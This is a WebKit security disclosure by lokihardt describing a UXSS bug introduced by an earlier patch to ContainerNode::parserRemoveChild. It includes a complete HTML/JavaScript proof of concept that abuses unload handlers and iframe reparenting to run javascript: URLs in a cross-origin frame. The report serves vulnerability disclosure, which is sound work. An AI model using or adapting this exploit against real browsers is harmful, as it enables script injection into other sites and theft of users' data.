WebKit: UXSS: the patch of #1110 made another bug 




Here's the patch of #1110.
<a href="https://trac.webkit.org/changeset/212218/trunk/Source/WebCore/dom/ContainerNode.cpp" title="" class="" rel="nofollow">https://trac.webkit.org/changeset/212218/trunk/Source/WebCore/dom/ContainerNode.cpp</a>

void ContainerNode::parserRemoveChild(Node& oldChild) 
{ 
    disconnectSubframesIfNeeded(*this, DescendantsOnly); <<---- (a)
    ...
}

(a) was added for the fix. But in |disconnectSubframesIfNeeded|, which fires unload event handlers, |oldChild|'s parent may be replaced. As a result, subframes of |oldChild| will be not detached.

PoC:
<body>
    <div>
        
            <p>
                <script>
                d = document.querySelector('div');
                p = document.querySelector('p');
                p.parentElement.appendChild(document.createElement('iframe')).contentWindow.onunload = () => {
                    document.body.appendChild(p);
                    d.remove();

                    f = p.appendChild(document.createElement('iframe'));
                    f.onload = () => {
                        f.onload = null;

                        document.documentElement.innerHTML = '';

                        f.src = 'javascript:alert(location)';

                        let xml = `
<svg xmlns="<a href="http://www.w3.org/2000/svg" title="" class="" rel="nofollow">http://www.w3.org/2000/svg</a>">
<script>
document.documentElement.appendChild(document.createElementNS('<a href="http://www.w3.org/1999/xhtml" title="" class="" rel="nofollow">http://www.w3.org/1999/xhtml</a>', 'iframe')).contentWindow.onunload = () => {
    document.documentElement.appendChild(parent.f.parentElement.parentElement.parentElement);
};
</sc` + `ript>
<element a="1" a="2" />
</svg>`;

                        let tmp = document.documentElement.appendChild(document.createElement('iframe'));
                        tmp.src = URL.createObjectURL(new Blob([xml], {type: 'text/xml'}));
                    };
                    f.src = '<a href="https://abc.xyz/';" title="" class="" rel="nofollow">https://abc.xyz/';</a>
                };
                </script>
            
        </p>
    </div>
</body>


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: lokihardt